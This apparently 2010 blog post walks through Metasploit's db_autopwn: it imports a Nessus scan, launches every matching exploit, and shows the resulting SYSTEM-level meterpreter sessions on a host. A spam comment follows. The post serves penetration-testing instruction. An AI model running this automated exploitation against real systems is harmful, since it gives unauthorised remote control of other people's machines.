Monday, November 15, 2010

Metasploit Autopwn with Nessus

Use SQLite3 database driver
msf > db_driver sqlite3

Create "pentest" database
msf > db_create pentest

Import Nessus scan result
msf > db_import /tmp/131_107_1_101_scan.nessus

Display matching exploit modules
msf > db_autopwn -t -x

Launch matching exploits
msf > db_autopwn -e -x -r

Display open sessions
msf > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:34013 -> 131.107.1.101:1063
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:14816 -> 131.107.1.101:1064
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:20971 -> 131.107.1.101:1065
4 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:5517 -> 131.107.1.101:1066
5 meterpreter x86/win32 DEN-WEB1\IUSR_MICROSOF-3UK0WZ @ DEN-WEB1 131.107.1.252:8837 -> 131.107.1.101:1068

msf > sessions -l

msf > sessions -i 1
Posted by at

1 comment:

  1. Saad AmirDecember 27, 2011 at 6:43 AM

    Your programming has very helpful for the students.That give knowledge about the new article of the education skills for the student.
    Thanks....
    regards, saad from
    Education

    ReplyDelete

Subscribe to: Post Comments (Atom)